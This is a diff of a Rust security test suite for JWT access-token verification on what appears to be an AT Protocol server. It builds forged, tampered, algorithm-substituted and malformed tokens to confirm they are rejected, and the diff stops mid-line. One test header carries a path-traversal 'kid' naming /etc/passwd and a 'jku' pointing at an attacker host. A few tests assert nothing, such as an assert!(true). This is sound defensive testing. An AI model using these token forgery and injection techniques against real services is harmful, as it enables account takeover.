"did:plc:test"; 284 - let header = json!({ 285 - "alg": "ES256K", 286 - "typ": TOKEN_TYPE_ACCESS 287 }); 288 - let claims = json!({ 289 - "iss": did, 290 - "sub": did, 291 - "aud": "did:web:test.pds", 292 - "iat": Utc::now().timestamp(), 293 - "exp": Utc::now().timestamp() + 3600, 294 - "jti": "no-scope-token" 295 - }); 296 - let token = create_custom_jwt(&header, &claims, &key_bytes); 297 - let result = verify_access_token(&token, &key_bytes); 298 - assert!( 299 - result.is_err(), 300 - "Missing scope must be rejected for access tokens" 301 - ); 302 - } 303 304 - #[test] 305 - fn test_jwt_security_expired_token_rejected() { 306 - let key_bytes = generate_user_key(); 307 - let did = "did:plc:test"; 308 - let header = json!({ 309 - "alg": "ES256K", 310 - "typ": TOKEN_TYPE_ACCESS 311 }); 312 - let claims = json!({ 313 - "iss": did, 314 - "sub": did, 315 - "aud": "did:web:test.pds", 316 - "iat": Utc::now().timestamp() - 7200, 317 - "exp": Utc::now().timestamp() - 3600, 318 - "jti": "expired-token", 319 - "scope": SCOPE_ACCESS 320 }); 321 - let expired_token = create_custom_jwt(&header, &claims, &key_bytes); 322 - let result = verify_access_token(&expired_token, &key_bytes); 323 - assert!(result.is_err(), "Expired token must be rejected"); 324 - let err_msg = result.err().unwrap().to_string(); 325 - assert!(err_msg.contains("expired"), "Error: {}", err_msg); 326 } 327 328 #[test] 329 - fn test_jwt_security_future_iat_accepted() { 330 let key_bytes = generate_user_key(); 331 let did = "did:plc:test"; 332 - let header = json!({ 333 - "alg": "ES256K", 334 - "typ": TOKEN_TYPE_ACCESS 335 }); 336 - let claims = json!({ 337 - "iss": did, 338 - "sub": did, 339 - "aud": "did:web:test.pds", 340 - "iat": Utc::now().timestamp() + 60, 341 - "exp": Utc::now().timestamp() + 7200, 342 - "jti": "future-iat-token", 343 - "scope": SCOPE_ACCESS 344 }); 345 - let token = create_custom_jwt(&header, &claims, &key_bytes); 346 - let result = verify_access_token(&token, &key_bytes); 347 - assert!( 348 - result.is_ok(), 349 - "Slight future iat should be accepted for clock skew tolerance" 350 - ); 351 - } 352 353 - #[test] 354 - fn test_jwt_security_cross_user_key_attack() { 355 - let key_bytes_user1 = generate_user_key(); 356 - let key_bytes_user2 = generate_user_key(); 357 - let did = "did:plc:user1"; 358 - let token = create_access_token(did, &key_bytes_user1).expect("create token"); 359 - let result = verify_access_token(&token, &key_bytes_user2); 360 - assert!( 361 - result.is_err(), 362 - "Token signed by user1's key must not verify with user2's key" 363 - ); 364 - } 365 366 - #[test] 367 - fn test_jwt_security_signature_truncation_rejected() { 368 - let key_bytes = generate_user_key(); 369 - let did = "did:plc:test"; 370 - let token = create_access_token(did, &key_bytes).expect("create token"); 371 - let parts: Vec<&str> = token.split('.').collect(); 372 - let sig_bytes = URL_SAFE_NO_PAD.decode(parts[2]).unwrap(); 373 - let truncated_sig = URL_SAFE_NO_PAD.encode(&sig_bytes[..32]); 374 - let truncated_token = format!("{}.{}.{}", parts[0], parts[1], truncated_sig); 375 - let result = verify_access_token(&truncated_token, &key_bytes); 376 - assert!(result.is_err(), "Truncated signature must be rejected"); 377 - } 378 379 - #[test] 380 - fn test_jwt_security_signature_extension_rejected() { 381 - let key_bytes = generate_user_key(); 382 - let did = "did:plc:test"; 383 - let token = create_access_token(did, &key_bytes).expect("create token"); 384 - let parts: Vec<&str> = token.split('.').collect(); 385 - let mut sig_bytes = URL_SAFE_NO_PAD.decode(parts[2]).unwrap(); 386 - sig_bytes.extend_from_slice(&[0u8; 32]); 387 - let extended_sig = URL_SAFE_NO_PAD.encode(&sig_bytes); 388 - let extended_token = format!("{}.{}.{}", parts[0], parts[1], extended_sig); 389 - let result = verify_access_token(&extended_token, &key_bytes); 390 - assert!(result.is_err(), "Extended signature must be rejected"); 391 } 392 393 #[test] 394 - fn test_jwt_security_malformed_tokens_rejected() { 395 let key_bytes = generate_user_key(); 396 - let malformed_tokens = vec![ 397 - "", 398 - "not-a-token", 399 - "one.two", 400 - "one.two.three.four", 401 - "....", 402 - "eyJhbGciOiJFUzI1NksifQ", 403 - "eyJhbGciOiJFUzI1NksifQ.", 404 - "eyJhbGciOiJFUzI1NksifQ..", 405 - ".eyJzdWIiOiJ0ZXN0In0.", 406 - "!!invalid-base64!!.eyJzdWIiOiJ0ZXN0In0.sig", 407 - "eyJhbGciOiJFUzI1NksifQ.!!invalid!!.sig", 408 - ]; 409 - for token in malformed_tokens { 410 - let result = verify_access_token(token, &key_bytes); 411 - assert!( 412 - result.is_err(), 413 - "Malformed token '{}' must be rejected", 414 - if token.len() > 40 { 415 - &token[..40] 416 - } else { 417 - token 418 - } 419 - ); 420 - } 421 - } 422 423 - #[test] 424 - fn test_jwt_security_missing_required_claims_rejected() { 425 - let key_bytes = generate_user_key(); 426 - let did = "did:plc:test"; 427 - let test_cases = vec![ 428 - ( 429 - json!({ 430 - "iss": did, 431 - "sub": did, 432 - "aud": "did:web:test", 433 - "iat": Utc::now().timestamp(), 434 - "scope": SCOPE_ACCESS 435 - }), 436 - "exp", 437 - ), 438 - ( 439 - json!({ 440 - "iss": did, 441 - "sub": did, 442 - "aud": "did:web:test", 443 - "exp": Utc::now().timestamp() + 3600, 444 - "scope": SCOPE_ACCESS 445 - }), 446 - "iat", 447 - ), 448 - ( 449 - json!({ 450 - "iss": did, 451 - "aud": "did:web:test", 452 - "iat": Utc::now().timestamp(), 453 - "exp": Utc::now().timestamp() + 3600, 454 - "scope": SCOPE_ACCESS 455 - }), 456 - "sub", 457 - ), 458 - ]; 459 - for (claims, missing_claim) in test_cases { 460 - let header = json!({ 461 - "alg": "ES256K", 462 - "typ": TOKEN_TYPE_ACCESS 463 - }); 464 - let token = create_custom_jwt(&header, &claims, &key_bytes); 465 - let result = verify_access_token(&token, &key_bytes); 466 - assert!( 467 - result.is_err(), 468 - "Token missing '{}' claim must be rejected", 469 - missing_claim 470 - ); 471 } 472 - } 473 474 - #[test] 475 - fn test_jwt_security_invalid_header_json_rejected() { 476 - let key_bytes = generate_user_key(); 477 let invalid_header = URL_SAFE_NO_PAD.encode("{not valid json}"); 478 let claims_b64 = URL_SAFE_NO_PAD.encode(r#"{"sub":"test"}"#); 479 let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 64]); 480 - let malicious_token = format!("{}.{}.{}", invalid_header, claims_b64, fake_sig); 481 - let result = verify_access_token(&malicious_token, &key_bytes); 482 - assert!(result.is_err(), "Invalid header JSON must be rejected"); 483 - } 484 485 - #[test] 486 - fn test_jwt_security_invalid_claims_json_rejected() { 487 - let key_bytes = generate_user_key(); 488 let header_b64 = URL_SAFE_NO_PAD.encode(r#"{"alg":"ES256K","typ":"at+jwt"}"#); 489 let invalid_claims = URL_SAFE_NO_PAD.encode("{not valid json}"); 490 - let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 64]); 491 - let malicious_token = format!("{}.{}.{}", header_b64, invalid_claims, fake_sig); 492 - let result = verify_access_token(&malicious_token, &key_bytes); 493 - assert!(result.is_err(), "Invalid claims JSON must be rejected"); 494 } 495 496 #[test] 497 - fn test_jwt_security_header_injection_attack() { 498 let key_bytes = generate_user_key(); 499 let did = "did:plc:test"; 500 - let header = json!({ 501 - "alg": "ES256K", 502 - "typ": TOKEN_TYPE_ACCESS, 503 - "kid": "../../../../../../etc/passwd", 504 - "jku": "https://attacker.com/keys" 505 - }); 506 - let claims = json!({ 507 - "iss": did, 508 - "sub": did, 509 - "aud": "did:web:test.pds", 510 - "iat": Utc::now().timestamp(), 511 - "exp": Utc::now().timestamp() + 3600, 512 - "jti": "header-injection-token", 513 - "scope": SCOPE_ACCESS 514 - }); 515 - let token = create_custom_jwt(&header, &claims, &key_bytes); 516 - let result = verify_access_token(&token, &key_bytes); 517 - assert!( 518 - result.is_ok(), 519 - "Extra header fields should not cause issues (we ignore them)" 520 - ); 521 - } 522 523 - #[test] 524 - fn test_jwt_security_claims_type_confusion() { 525 - let key_bytes = generate_user_key(); 526 - let header = json!({ 527 - "alg": "ES256K", 528 - "typ": TOKEN_TYPE_ACCESS 529 }); 530 - let claims = json!({ 531 - "iss": 12345, 532 - "sub": ["did:plc:test"], 533 - "aud": {"url": "did:web:test"}, 534 - "iat": "not a number", 535 - "exp": "also not a number", 536 - "jti": null, 537 - "scope": SCOPE_ACCESS 538 - }); 539 - let token = create_custom_jwt(&header, &claims, &key_bytes); 540 - let result = verify_access_token(&token, &key_bytes); 541 - assert!(result.is_err(), "Claims with wrong types must be rejected"); 542 - } 543 544 - #[test] 545 - fn test_jwt_security_unicode_injection_in_claims() { 546 - let key_bytes = generate_user_key(); 547 - let header = json!({ 548 - "alg": "ES256K", 549 - "typ": TOKEN_TYPE_ACCESS 550 - }); 551 - let claims = json!({ 552 - "iss": "did:plc:test\u{0000}attacker", 553 - "sub": "did:plc:test\u{202E}rekatta", 554 - "aud": "did:web:test.pds", 555 - "iat": Utc::now().timestamp(), 556 - "exp": Utc::now().timestamp() + 3600, 557 - "jti": "unicode-injection", 558 - "scope": SCOPE_ACCESS 559 }); 560 - let token = create_custom_jwt(&header, &claims, &key_bytes); 561 - let result = verify_access_token(&token, &key_bytes); 562 - if result.is_ok() { 563 - let data = result.unwrap(); 564 - assert!( 565 - !data.claims.sub.contains('\0'), 566 - "Null bytes in claims should be sanitized or rejected" 567 - ); 568 - } 569 - } 570 571 - #[test] 572 - fn test_jwt_security_signature_verification_is_constant_time() { 573 - let key_bytes = generate_user_key(); 574 - let did = "did:plc:test"; 575 - let valid_token = create_access_token(did, &key_bytes).expect("create token"); 576 - let parts: Vec<&str> = valid_token.split('.').collect(); 577 - let mut almost_valid = URL_SAFE_NO_PAD.decode(parts[2]).unwrap(); 578 - almost_valid[0] ^= 1; 579 - let almost_valid_sig = URL_SAFE_NO_PAD.encode(&almost_valid); 580 - let almost_valid_token = format!("{}.{}.{}", parts[0], parts[1], almost_valid_sig); 581 - let completely_invalid_sig = URL_SAFE_NO_PAD.encode(&[0xFFu8; 64]); 582 - let completely_invalid_token = format!("{}.{}.{}", parts[0], parts[1], completely_invalid_sig); 583 - let _result1 = verify_access_token(&almost_valid_token, &key_bytes); 584 - let _result2 = verify_access_token(&completely_invalid_token, &key_bytes); 585 - assert!( 586 - true, 587 - "Signature verification should use constant-time comparison (timing attack prevention)" 588 - ); 589 - } 590 591 - #[test] 592 - fn test_jwt_security_valid_scopes_accepted() { 593 - let key_bytes = generate_user_key(); 594 - let did = "did:plc:test"; 595 - let valid_scopes = vec![SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]; 596 - for scope in valid_scopes { 597 - let header = json!({ 598 - "alg": "ES256K", 599 - "typ": TOKEN_TYPE_ACCESS 600 - }); 601 - let claims = json!({ 602 - "iss": did, 603 - "sub": did, 604 - "aud": "did:web:test.pds", 605 - "iat": Utc::now().timestamp(), 606 - "exp": Utc::now().timestamp() + 3600, 607 - "jti": format!("scope-test-{}", scope), 608 - "scope": scope 609 - }); 610 - let token = create_custom_jwt(&header, &claims, &key_bytes); 611 - let result = verify_access_token(&token, &key_bytes); 612 - assert!(result.is_ok(), "Valid scope '{}' should be accepted", scope); 613 - } 614 - } 615 616 - #[test] 617 - fn test_jwt_security_refresh_token_scope_rejected_as_access() { 618 - let key_bytes = generate_user_key(); 619 - let did = "did:plc:test"; 620 - let header = json!({ 621 - "alg": "ES256K", 622 - "typ": TOKEN_TYPE_ACCESS 623 }); 624 - let claims = json!({ 625 - "iss": did, 626 - "sub": did, 627 - "aud": "did:web:test.pds", 628 - "iat": Utc::now().timestamp(), 629 - "exp": Utc::now().timestamp() + 3600, 630 - "jti": "refresh-scope-access-typ", 631 - "scope": SCOPE_REFRESH 632 - }); 633 - let token = create_custom_jwt(&header, &claims, &key_bytes); 634 - let result = verify_access_token(&token, &key_bytes); 635 - assert!( 636 - result.is_err(), 637 - "Refresh scope with access token type must be rejected" 638 - ); 639 } 640 641 #[test] 642 - fn test_jwt_security_get_did_extraction_safe() { 643 let key_bytes = generate_user_key(); 644 let did = "did:plc:legitimate"; 645 let token = create_access_token(did, &key_bytes).expect("create token"); 646 - let extracted = get_did_from_token(&token).expect("extract did"); 647 - assert_eq!(extracted, did); 648 assert!(get_did_from_token("invalid").is_err()); 649 assert!(get_did_from_token("a.b").is_err()); 650 assert!(get_did_from_token("").is_err()); 651 - let header_b64 = URL_SAFE_NO_PAD.encode(r#"{"alg":"ES256K"}"#); 652 - let claims_b64 = URL_SAFE_NO_PAD.encode(r#"{"iss":"did:plc:iss","sub":"did:plc:sub"}"#); 653 - let fake_sig = URL_SAFE_NO_PAD.encode(&[0u8; 64]); 654 - let unverified_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig); 655 - let extracted_unsafe = get_did_from_token(&unverified_token).expect("extract unsafe"); 656 - assert_eq!( 657 - extracted_unsafe, "did:plc:sub", 658 - "get_did_from_token extracts sub without verification (by design for lookup)" 659 - ); 660 - } 661 662 - #[test] 663 - fn test_jwt_security_get_jti_extraction_safe() { 664 - let key_bytes = generate_user_key(); 665 - let did = "did:plc:test"; 666 - let token = create_access_token(did, &key_bytes).expect("create token"); 667 - let jti = get_jti_from_token(&token).expect("extract jti"); 668 assert!(!jti.is_empty()); 669 assert!(get_jti_from_token("invalid").is_err()); 670 - assert!(get_jti_from_token("a.b").is_err()); 671 let header_b64 = URL_SAFE_NO_PAD.encode(r#"{"alg":"ES256K"}"#); 672 - let claims_b64 = URL_SAFE_NO_PAD.encode(r#"{"iss":"did:plc:test"}"#); 673 let fake_sig = URL_SAFE_NO_PAD.encode(&[0u8; 64]); 674 - let no_jti_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig); 675 - assert!( 676 - get_jti_from_token(&no_jti_token).is_err(), 677 - "Missing jti should error" 678 - ); 679 - } 680 681 - #[test] 682 - fn test_jwt_security_key_from_invalid_bytes_rejected() { 683 - let invalid_keys: Vec<&[u8]> = vec![&[], &[0u8; 31], &[0u8; 33], &[0xFFu8; 32]]; 684 - for key in invalid_keys { 685 - let result = create_access_token("did:plc:test", key); 686 - if result.is_ok() { 687 - let token = result.unwrap(); 688 - let verify_result = verify_access_token(&token, key); 689 - if verify_result.is_err() { 690 - continue; 691 - } 692 - } 693 - } 694 } 695 696 #[test] 697 - fn test_jwt_security_boundary_exp_values() { 698 let key_bytes = generate_user_key(); 699 let did = "did:plc:test"; 700 - let header = json!({ 701 - "alg": "ES256K", 702 - "typ": TOKEN_TYPE_ACCESS 703 - }); 704 - let now = Utc::now().timestamp(); 705 - let just_expired = json!({ 706 - "iss": did, 707 - "sub": did, 708 - "aud": "did:web:test.pds", 709 - "iat": now - 10, 710 - "exp": now - 1, 711 - "jti": "just-expired", 712 - "scope": SCOPE_ACCESS 713 - }); 714 - let token1 = create_custom_jwt(&header, &just_expired, &key_bytes); 715 - assert!( 716 - verify_access_token(&token1, &key_bytes).is_err(), 717 - "Just expired token must be rejected" 718 - ); 719 - let expires_exactly_now = json!({ 720 - "iss": did, 721 - "sub": did, 722 - "aud": "did:web:test.pds", 723 - "iat": now - 10, 724 - "exp": now, 725 - "jti": "expires-now", 726 - "scope": SCOPE_ACCESS 727 - }); 728 - let token2 = create_custom_jwt(&header, &expires_exactly_now, &key_bytes); 729 - let result2 = verify_access_token(&token2, &key_bytes); 730 - assert!( 731 - result2.is_err() || result2.is_ok(), 732 - "Token expiring exactly now is a boundary case - either behavior is acceptable" 733 - ); 734 - } 735 736 - #[test] 737 - fn test_jwt_security_very_long_exp_handled() { 738 - let key_bytes = generate_user_key(); 739 - let did = "did:plc:test"; 740 let header = json!({ 741 - "alg": "ES256K", 742 - "typ": TOKEN_TYPE_ACCESS 743 }); 744 let claims = json!({ 745 - "iss": did, 746 - "sub": did, 747 - "aud": "did:web:test.pds", 748 - "iat": Utc::now().timestamp(), 749 - "exp": i64::MAX, 750 - "jti": "far-future", 751 - "scope": SCOPE_ACCESS 752 }); 753 - let token = create_custom_jwt(&header, &claims, &key_bytes); 754 - let _result = verify_access_token(&token, &key_bytes); 755 - } 756 757 - #[test] 758 - fn test_jwt_security_negative_timestamps_handled() { 759 - let key_bytes = generate_user_key(); 760 - let did = "did:plc:test"; 761 - let header = json!({ 762 - "alg": "ES256K", 763 - "typ": TOKEN_TYPE_ACCESS 764 - }); 765 - let claims = json!({ 766 - "iss": did, 767 - "sub": did, 768 - "aud": "did:web:test.pds", 769 - "iat": -1000000000i64, 770 - "exp": Utc::now().timestamp() + 3600, 771 - "jti": "negative-iat", 772 - "scope": SCOPE_ACCESS 773 - }); 774 - let token = create_custom_jwt(&header, &claims, &key_bytes); 775 - let _result = verify_access_token(&token, &key_bytes); 776 } 777 778 #[tokio::test] 779 - async fn test_jwt_security_server_rejects_forged_session_token() { 780 let url = base_url().await; 781 let http_client = client(); 782 let key_bytes = generate_user_key(); 783 - let did = "did:plc:fake-user"; 784 - let forged_token = create_access_token(did, &key_bytes).expect("create forged token"); 785 - let res = http_client 786 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 787 .header("Authorization", format!("Bearer {}", forged_token)) 788 - .send() 789 - .await 790 - .unwrap(); 791 - assert_eq!( 792 - res.status(), 793 - StatusCode::UNAUTHORIZED, 794 - "Forged session token must be rejected" 795 - ); 796 - } 797 798 - #[tokio::test] 799 - async fn test_jwt_security_server_rejects_expired_token() { 800 - let url = base_url().await; 801 - let http_client = client(); 802 let (access_jwt, _did) = create_account_and_login(&http_client).await; 803 let parts: Vec<&str> = access_jwt.split('.').collect(); 804 let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap(); 805 let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap(); 806 payload["exp"] = json!(Utc::now().timestamp() - 3600); 807 - let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 808 - let tampered_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]); 809 - let res = http_client 810 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 811 - .header("Authorization", format!("Bearer {}", tampered_token)) 812 - .send() 813 - .await 814 - .unwrap(); 815 - assert_eq!( 816 - res.status(), 817 - StatusCode::UNAUTHORIZED, 818 - "Tampered/expired token must be rejected" 819 - ); 820 - } 821 822 - #[tokio::test] 823 - async fn test_jwt_security_server_rejects_tampered_did() { 824 - let url = base_url().await; 825 - let http_client = client(); 826 - let (access_jwt, _did) = create_account_and_login(&http_client).await; 827 - let parts: Vec<&str> = access_jwt.split('.').collect(); 828 - let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap(); 829 - let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap(); 830 - payload["sub"] = json!("did:plc:attacker"); 831 - payload["iss"] = json!("did:plc:attacker"); 832 - let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 833 - let tampered_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]); 834 - let res = http_client 835 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 836 .header("Authorization", format!("Bearer {}", tampered_token)) 837 - .send() 838 - .await 839 - .unwrap(); 840 - assert_eq!( 841 - res.status(), 842 - StatusCode::UNAUTHORIZED, 843 - "DID-tampered token must be rejected" 844 - ); 845 } 846 847 #[tokio::test] 848 - async fn test_jwt_security_refresh_token_replay_protection() { 849 let url = base_url().await; 850 let http_client = client(); 851 - let ts = Utc::now().timestamp_millis(); 852 - let handle = format!("rt-replay-jwt-{}", ts); 853 - let email = format!("rt-replay-jwt-{}@example.com", ts); 854 - let password = "test-password-123"; 855 - let create_res = http_client 856 - .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 857 - .json(&json!({ 858 - "handle": handle, 859 - "email": email, 860 - "password": password 861 - })) 862 - .send() 863 - .await 864 - .unwrap(); 865 - assert_eq!(create_res.status(), StatusCode::OK); 866 - let account: Value = create_res.json().await.unwrap(); 867 - let did = account["did"].as_str().unwrap(); 868 - let conn_str = get_db_connection_string().await; 869 - let pool = sqlx::postgres::PgPoolOptions::new() 870 - .max_connections(2) 871 - .connect(&conn_str) 872 - .await 873 - .expect("Failed to connect to test database"); 874 - let verification_code: String = sqlx::query_scalar!( 875 - "SELECT code FROM channel_verifications WHERE user_id = (SELECT id FROM users WHERE did = $1) AND channel = 'email'", 876 - did 877 - ) 878 - .fetch_one(&pool) 879 - .await 880 - .expect("Failed to get verification code"); 881 - let confirm_res = http_client 882 - .post(format!("{}/xrpc/com.atproto.server.confirmSignup", url)) 883 - .json(&json!({ 884 - "did": did, 885 - "verificationCode": verification_code 886 - })) 887 - .send() 888 - .await 889 - .unwrap(); 890 - assert_eq!(confirm_res.status(), StatusCode::OK); 891 - let confirmed: Value = confirm_res.json().await.unwrap(); 892 - let refresh_jwt = confirmed["refreshJwt"].as_str().unwrap().to_string(); 893 - let first_refresh = http_client 894 - .post(format!("{}/xrpc/com.atproto.server.refreshSession", url)) 895 - .header("Authorization", format!("Bearer {}", refresh_jwt)) 896 - .send() 897 - .await 898 - .unwrap(); 899 - assert_eq!( 900 - first_refresh.status(), 901 - StatusCode::OK, 902 - "First refresh should succeed" 903 - ); 904 - let replay_res = http_client 905 - .post(format!("{}/xrpc/com.atproto.server.refreshSession", url)) 906 - .header("Authorization", format!("Bearer {}", refresh_jwt)) 907 - .send() 908 - .await 909 - .unwrap(); 910 - assert_eq!( 911 - replay_res.status(), 912 - StatusCode::UNAUTHORIZED, 913 - "Refresh token replay must be rejected" 914 - ); 915 - } 916 917 - #[tokio::test] 918 - async fn test_jwt_security_authorization_header_formats() { 919 - let url = base_url().await; 920 - let http_client = client(); 921 - let (access_jwt, _did) = create_account_and_login(&http_client).await; 922 - let valid_res = http_client 923 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 924 .header("Authorization", format!("Bearer {}", access_jwt)) 925 - .send() 926 - .await 927 - .unwrap(); 928 - assert_eq!( 929 - valid_res.status(), 930 - StatusCode::OK, 931 - "Valid Bearer format should work" 932 - ); 933 - let lowercase_res = http_client 934 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 935 .header("Authorization", format!("bearer {}", access_jwt)) 936 - .send() 937 - .await 938 - .unwrap(); 939 - assert_eq!( 940 - lowercase_res.status(), 941 - StatusCode::OK, 942 - "Lowercase 'bearer' should be accepted (RFC 7235 case-insensitivity)" 943 - ); 944 - let basic_res = http_client 945 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 946 .header("Authorization", format!("Basic {}", access_jwt)) 947 - .send() 948 - .await 949 - .unwrap(); 950 - assert_eq!( 951 - basic_res.status(), 952 - StatusCode::UNAUTHORIZED, 953 - "Basic scheme must be rejected" 954 - ); 955 - let no_scheme_res = http_client 956 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 957 .header("Authorization", &access_jwt) 958 - .send() 959 - .await 960 - .unwrap(); 961 - assert_eq!( 962 - no_scheme_res.status(), 963 - StatusCode::UNAUTHORIZED, 964 - "Missing scheme must be rejected" 965 - ); 966 - let empty_token_res = http_client 967 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 968 .header("Authorization", "Bearer ") 969 - .send() 970 - .await 971 - .unwrap(); 972 - assert_eq!( 973 - empty_token_res.status(), 974 - StatusCode::UNAUTHORIZED, 975 - "Empty token must be rejected" 976 - ); 977 } 978 979 #[tokio::test] 980 - async fn test_jwt_security_deleted_session_rejected() { 981 let url = base_url().await; 982 let http_client = client(); 983 let (access_jwt, _did) = create_account_and_login(&http_client).await; 984 - let get_res = http_client 985 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 986 .header("Authorization", format!("Bearer {}", access_jwt)) 987 - .send() 988 - .await 989 - .unwrap(); 990 - assert_eq!( 991 - get_res.status(), 992 - StatusCode::OK, 993 - "Token should work before logout" 994 - ); 995 - let logout_res = http_client 996 - .post(format!("{}/xrpc/com.atproto.server.deleteSession", url)) 997 .header("Authorization", format!("Bearer {}", access_jwt)) 998 - .send() 999 - .await 1000 - .unwrap(); 1001 - assert_eq!(logout_res.status(), StatusCode::OK); 1002 - let after_logout_res = http_client 1003 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 1004 .header("Authorization", format!("Bearer {}", access_jwt)) 1005 - .send() 1006 - .await 1007 - .unwrap(); 1008 - assert_eq!( 1009 - after_logout_res.status(), 1010 - StatusCode::UNAUTHORIZED, 1011 - "Token must be rejected after logout" 1012 - ); 1013 } 1014 1015 #[tokio::test] 1016 - async fn test_jwt_security_deactivated_account_rejected() { 1017 let url = base_url().await; 1018 let http_client = client(); 1019 let (access_jwt, _did) = create_account_and_login(&http_client).await; 1020 - let deact_res = http_client 1021 - .post(format!("{}/xrpc/com.atproto.server.deactivateAccount", url)) 1022 .header("Authorization", format!("Bearer {}", access_jwt)) 1023 .json(&json!({})) 1024 - .send() 1025 - .await 1026 - .unwrap(); 1027 - assert_eq!(deact_res.status(), StatusCode::OK); 1028 - let get_res = http_client 1029 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 1030 .header("Authorization", format!("Bearer {}", access_jwt)) 1031 - .send() 1032 - .await 1033 - .unwrap(); 1034 - assert_eq!( 1035 - get_res.status(), 1036 - StatusCode::UNAUTHORIZED, 1037 - "Deactivated account token must be rejected" 1038 - ); 1039 - let body: Value = get_res.json().await.unwrap(); 1040 assert_eq!(body["error"], "AccountDeactivated"); 1041 }
··· 38 } 39 40 #[test] 41 + fn test_signature_attacks() { 42 let key_bytes = generate_user_key(); 43 let did = "did:plc:test"; 44 let token = create_access_token(did, &key_bytes).expect("create token"); 45 let parts: Vec<&str> = token.split('.').collect(); 46 + 47 let forged_signature = URL_SAFE_NO_PAD.encode(&[0u8; 64]); 48 let forged_token = format!("{}.{}.{}", parts[0], parts[1], forged_signature); 49 let result = verify_access_token(&forged_token, &key_bytes); 50 assert!(result.is_err(), "Forged signature must be rejected"); 51 + assert!(result.err().unwrap().to_string().to_lowercase().contains("signature")); 52 53 let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap(); 54 let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap(); 55 payload["sub"] = json!("did:plc:attacker"); 56 let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 57 let modified_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]); 58 + assert!(verify_access_token(&modified_token, &key_bytes).is_err(), "Modified payload must be rejected"); 59 + 60 + let sig_bytes = URL_SAFE_NO_PAD.decode(parts[2]).unwrap(); 61 + let truncated_sig = URL_SAFE_NO_PAD.encode(&sig_bytes[..32]); 62 + let truncated_token = format!("{}.{}.{}", parts[0], parts[1], truncated_sig); 63 + assert!(verify_access_token(&truncated_token, &key_bytes).is_err(), "Truncated signature must be rejected"); 64 + 65 + let mut extended_sig = sig_bytes.clone(); 66 + extended_sig.extend_from_slice(&[0u8; 32]); 67 + let extended_token = format!("{}.{}.{}", parts[0], parts[1], URL_SAFE_NO_PAD.encode(&extended_sig)); 68 + assert!(verify_access_token(&extended_token, &key_bytes).is_err(), "Extended signature must be rejected"); 69 + 70 + let key_bytes_user2 = generate_user_key(); 71 + assert!(verify_access_token(&token, &key_bytes_user2).is_err(), "Token signed with different key must be rejected"); 72 } 73 74 #[test] 75 + fn test_algorithm_substitution_attacks() { 76 let key_bytes = generate_user_key(); 77 let did = "did:plc:test"; 78 + 79 + let none_header = json!({ "alg": "none", "typ": TOKEN_TYPE_ACCESS }); 80 let claims = json!({ 81 + "iss": did, "sub": did, "aud": "did:web:test.pds", 82 + "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 83 + "jti": "attack-token", "scope": SCOPE_ACCESS 84 }); 85 + let none_token = create_unsigned_jwt(&none_header, &claims); 86 + assert!(verify_access_token(&none_token, &key_bytes).is_err(), "Algorithm 'none' must be rejected"); 87 88 + let hs256_header = json!({ "alg": "HS256", "typ": TOKEN_TYPE_ACCESS }); 89 + let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&hs256_header).unwrap()); 90 let claims_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&claims).unwrap()); 91 use hmac::{Hmac, Mac}; 92 type HmacSha256 = Hmac<Sha256>; ··· 94 let mut mac = HmacSha256::new_from_slice(&key_bytes).unwrap(); 95 mac.update(message.as_bytes()); 96 let hmac_sig = mac.finalize().into_bytes(); 97 + let hs256_token = format!("{}.{}", message, URL_SAFE_NO_PAD.encode(&hmac_sig)); 98 + assert!(verify_access_token(&hs256_token, &key_bytes).is_err(), "HS256 substitution must be rejected"); 99 100 + for (alg, sig_len) in [("RS256", 256), ("ES256", 64)] { 101 + let header = json!({ "alg": alg, "typ": TOKEN_TYPE_ACCESS }); 102 + let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 103 + let fake_sig = URL_SAFE_NO_PAD.encode(&vec![1u8; sig_len]); 104 + let token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig); 105 + assert!(verify_access_token(&token, &key_bytes).is_err(), "{} substitution must be rejected", alg); 106 + } 107 } 108 109 #[test] 110 + fn test_token_type_confusion() { 111 let key_bytes = generate_user_key(); 112 let did = "did:plc:test"; 113 114 let refresh_token = create_refresh_token(did, &key_bytes).expect("create refresh token"); 115 let result = verify_access_token(&refresh_token, &key_bytes); 116 + assert!(result.is_err(), "Refresh token as access must be rejected"); 117 + assert!(result.err().unwrap().to_string().contains("Invalid token type")); 118 119 let access_token = create_access_token(did, &key_bytes).expect("create access token"); 120 let result = verify_refresh_token(&access_token, &key_bytes); 121 + assert!(result.is_err(), "Access token as refresh must be rejected"); 122 + assert!(result.err().unwrap().to_string().contains("Invalid token type")); 123 124 + let service_token = create_service_token(did, "did:web:target", "com.example.method", 